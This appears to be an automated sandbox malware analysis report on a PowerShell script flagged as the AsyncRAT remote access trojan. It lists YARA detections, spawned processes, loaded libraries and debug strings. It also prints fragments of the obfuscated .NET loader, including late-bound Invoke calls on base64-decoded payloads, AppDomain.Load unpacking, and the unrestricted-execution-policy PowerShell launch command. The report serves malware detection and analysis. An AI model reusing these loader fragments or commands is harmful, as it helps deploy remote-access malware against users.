              Source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAB123D650_2_00007FFAAB123D65
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAB1239AD0_2_00007FFAAB1239AD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAB1F0FA40_2_00007FFAAB1F0FA4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00D5C2D85_2_00D5C2D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00D563405_2_00D56340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00D584B85_2_00D584B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00D5B5985_2_00D5B598
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00D55A705_2_00D55A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00D557285_2_00D55728
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00D50FA05_2_00D50FA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 1704
              Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.21380403568.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.213812227a0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.evad.winPS1@9/10@0/1
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7560
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\o8kSNczORMveFDjV
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oeawf5cb.5uc.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: WErY5oc4hl.ps1Virustotal: Detection: 31%
              Source: WErY5oc4hl.ps1ReversingLabs: Detection: 21%
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 1704
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb[ source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\RegSvcs.pdbF2 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb" source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB89 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb^2 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdbti4s|c;s source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb9\ source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdbj source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbH source: WERA716.tmp.dmp.12.dr
              Source: Binary string: ?koC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb% source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: %%.pdb)s( source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.pdb8 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbx source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: HP_o0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb: source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Management.pdbL0vw# source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Configuration.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Xml.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Windows.Forms.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2961772189.000000000611A000.00000004.00000020.00020000.00000000.sdmp, WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Drawing.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Management.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Management.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Core.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.pdb4 source: WERA716.tmp.dmp.12.dr
              Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: @ko.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.JAcwvugr7yueKabGzBseGV7hjHu3W5QkNTNx8sjM423vV0qUPhEfZ5MkLIEJU4xShmmuAovdOhpox4n3YIsmafGmDjbdd,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ._0L8f3WleevzcnPl9n2WNh7NW3wKOwPuy3tb1aRsXW0f6uDBis6nnThh3XPCCqA67oaXX8IvfAGwXsJMVtwgg9Ni2DmPT8,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.AXmSpip9Rgys9UoRCdGDlWOrb1oWCmZg9LzuKvf7aAgnKzemNYUyaBbirLIHk9vkM1Q5MLhWeOn1dI5xukaKG5mOVcOdq,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.pdozcqiNcmOnTnX1sUHm37yRWYhfKxfHJgJzzWfK4H9V6gQ9zRXQa28p93aV0bU5xPMwelYaDwx7MaHuT0cauWHxV6Umo,QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.ZUrIm4Kp1Nn4jNQE1iMoBcsuerfZEYytj3QZ()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[2],QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.sOh0Jlwra2Jn4MOGwAe1E2VHcq3RkFs1RAqN(Convert.FromBase64String(YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.JAcwvugr7yueKabGzBseGV7hjHu3W5QkNTNx8sjM423vV0qUPhEfZ5MkLIEJU4xShmmuAovdOhpox4n3YIsmafGmDjbdd,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ._0L8f3WleevzcnPl9n2WNh7NW3wKOwPuy3tb1aRsXW0f6uDBis6nnThh3XPCCqA67oaXX8IvfAGwXsJMVtwgg9Ni2DmPT8,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.AXmSpip9Rgys9UoRCdGDlWOrb1oWCmZg9LzuKvf7aAgnKzemNYUyaBbirLIHk9vkM1Q5MLhWeOn1dI5xukaKG5mOVcOdq,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.pdozcqiNcmOnTnX1sUHm37yRWYhfKxfHJgJzzWfK4H9V6gQ9zRXQa28p93aV0bU5xPMwelYaDwx7MaHuT0cauWHxV6Umo,QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.ZUrIm4Kp1Nn4jNQE1iMoBcsuerfZEYytj3QZ()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[2],QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.sOh0Jlwra2Jn4MOGwAe1E2VHcq3RkFs1RAqN(Convert.FromBase64String(YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAB126FDC push eax; iretd 0_2_00007FFAAB126FDD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAB12A0B1 push cs; ret 0_2_00007FFAAB12A0E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAB12AB3C push es; iretd 0_2_00007FFAAB12AB67
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAB12C752 pushfd ; ret 0_2_00007FFAAB12C757
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00D58080 push eax; iretd 5_2_00D58081
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00D54CC8 pushad ; retf 5_2_00D54CD1
